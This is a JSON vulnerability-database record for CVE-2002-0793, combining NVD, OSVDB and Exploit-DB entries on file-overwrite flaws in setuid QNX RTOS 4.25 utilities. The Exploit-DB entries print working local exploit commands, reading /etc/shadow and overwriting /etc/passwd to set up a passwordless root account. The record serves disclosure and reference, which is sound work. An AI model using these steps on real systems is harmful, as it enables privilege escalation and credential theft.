{"cve": [{"lastseen": "2020-10-03T11:36:59", "description": "Hard link and possibly symbolic link following vulnerabilities in QNX RTOS 4.25 (aka QNX4) allow local users to overwrite arbitrary files via (1) the -f argument to the monitor utility, (2) the -d argument to dumper, (3) the -c argument to crttrap, or (4) using the Watcom sample utility.", "edition": 3, "cvss3": {}, "published": "2002-08-12T04:00:00", "title": "CVE-2002-0793", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0793"], "modified": "2017-07-11T01:29:00", "cpe": ["cpe:/a:qnx:rtos:4.25"], "id": "CVE-2002-0793", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0793", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:qnx:rtos:4.25:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2002-0793"], "edition": 1, "description": "## Vulnerability Description\nQNX RTOS contains a flaw that may allow a malicious user to overwrite arbitrary files. The issue is triggered when a local attacker uses the \"crttrap -c\" command, which will potentially modify arbitrary files on the system.\n## Solution Description\nUpgrade to version 6.1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nQNX RTOS contains a flaw that may allow a malicious user to overwrite arbitrary files. 
The issue is triggered when a local attacker uses the \"crttrap -c\" command, which will potentially modify arbitrary files on the system.\n## Manual Testing Notes\ncrttrap -c /etc/shadow\n## References:\n[Related OSVDB ID: 12215](https://vulners.com/osvdb/OSVDB:12215)\n[Related OSVDB ID: 12216](https://vulners.com/osvdb/OSVDB:12216)\n[Related OSVDB ID: 12218](https://vulners.com/osvdb/OSVDB:12218)\nISS X-Force ID: 9231\n[CVE-2002-0793](https://vulners.com/cve/CVE-2002-0793)\nBugtraq ID: 4902\n", "modified": "2002-05-31T00:00:00", "published": "2002-05-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12217", "id": "OSVDB:12217", "type": "osvdb", "title": "QNX RTOS crttrap -c Argument Arbitrary File Overwrite", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2002-0793"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 12215](https://vulners.com/osvdb/OSVDB:12215)\n[Related OSVDB ID: 12216](https://vulners.com/osvdb/OSVDB:12216)\n[Related OSVDB ID: 12217](https://vulners.com/osvdb/OSVDB:12217)\nISS X-Force ID: 9231\n[CVE-2002-0793](https://vulners.com/cve/CVE-2002-0793)\nBugtraq ID: 4902\n", "modified": "2002-05-31T00:00:00", "published": "2002-05-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12218", "id": "OSVDB:12218", "type": "osvdb", "title": "QNX RTOS Watcom Utility Arbitrary File Overwrite", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2002-0793"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 12215](https://vulners.com/osvdb/OSVDB:12215)\n[Related OSVDB ID: 12217](https://vulners.com/osvdb/OSVDB:12217)\n[Related OSVDB ID: 
12218](https://vulners.com/osvdb/OSVDB:12218)\nISS X-Force ID: 9231\n[CVE-2002-0793](https://vulners.com/cve/CVE-2002-0793)\nBugtraq ID: 4902\n", "modified": "2002-05-31T00:00:00", "published": "2002-05-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12216", "id": "OSVDB:12216", "type": "osvdb", "title": "QNX RTOS dumper -d Argument Arbitrary File Overwrite", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T16:37:29", "description": "QNX RTOS 4.25 CRTTrap File Disclosure Vulnerability. CVE-2002-0793. Local exploit for linux platform", "published": "2002-05-31T00:00:00", "type": "exploitdb", "title": "QNX RTOS 4.25 CRTTrap File Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0793"], "modified": "2002-05-31T00:00:00", "id": "EDB-ID:21499", "href": "https://www.exploit-db.com/exploits/21499/", "sourceData": "source: http://www.securityfocus.com/bid/4901/info\r\n\r\nThe QNX RTOS crttrap binary includes a command-line option for specifying a configuration file. crttrap is installed setuid by default. Local attackers may specify an arbitrary system file in place of the configuration file and crttrap will disclose the contents of the arbitrary file. \r\n\r\ncrttrap -c /etc/shadow ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21499/"}, {"lastseen": "2016-02-02T16:37:38", "description": "QNX RTOS 4.25 monitor Arbitrary File Modification Vulnerability. CVE-2002-0793. 
Local exploit for linux platform", "published": "2002-05-31T00:00:00", "type": "exploitdb", "title": "QNX RTOS 4.25 monitor Arbitrary File Modification Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0793"], "modified": "2002-05-31T00:00:00", "id": "EDB-ID:21500", "href": "https://www.exploit-db.com/exploits/21500/", "sourceData": "source: http://www.securityfocus.com/bid/4902/info\r\n\r\nThe QNX RTOS monitor utility is prone to an issue which may allow local attackers to modify arbitrary system files (such as /etc/passwd). monitor is installed setuid root by default.\r\n\r\nThe monitor -f command line option may be used by a local attacker to cause an arbitrary system file to be overwritten. Once overwritten, the attacker will gain ownership of the file.\r\n\r\nmonitor -f /etc/passwd ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21500/"}, {"lastseen": "2016-02-02T16:37:46", "description": "QNX RTOS 4.25 dumper Arbitrary File Modification Vulnerability. CVE-2002-0793. Local exploit for linux platform", "published": "2002-05-31T00:00:00", "type": "exploitdb", "title": "QNX RTOS 4.25 dumper Arbitrary File Modification Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0793"], "modified": "2002-05-31T00:00:00", "id": "EDB-ID:21501", "href": "https://www.exploit-db.com/exploits/21501/", "sourceData": "source: http://www.securityfocus.com/bid/4904/info\r\n\r\nWhen creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'. 
\r\n\r\nExample exploit, with /bin/dumper:\r\n\r\nLet EVIL be the unprivileged user who wants to gain root access.\r\n\r\n#link to the passwd file: dumper dumps to [process name].dmp\r\n$ ln /etc/passwd /home/EVIL/ksh.dmp\r\n#call the program that will attempt to write to the hard link\r\n$ dumper -d /home/EVIL -p [PID of EVIL's ksh]\r\n#have dumper do its job by terminating the monitored process\r\n$ exit\r\n#at this point, /etc/passwd is overwritten by the binary dump, and more\r\nimportantly: EVIL is now the owner !\r\n$ echo root::0:0::///:/bin/sh > /etc/passwd\r\n#but now no login works because /etc/passwd is not owned by userid 0. #So\r\nyou do:\r\n\r\n$ passwd\r\n\r\n#and change your password. This gives /etc/passwd ownership back to root,\r\nkeeping the modifications you have made.\r\n\r\n$ su\r\n# ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21501/"}]}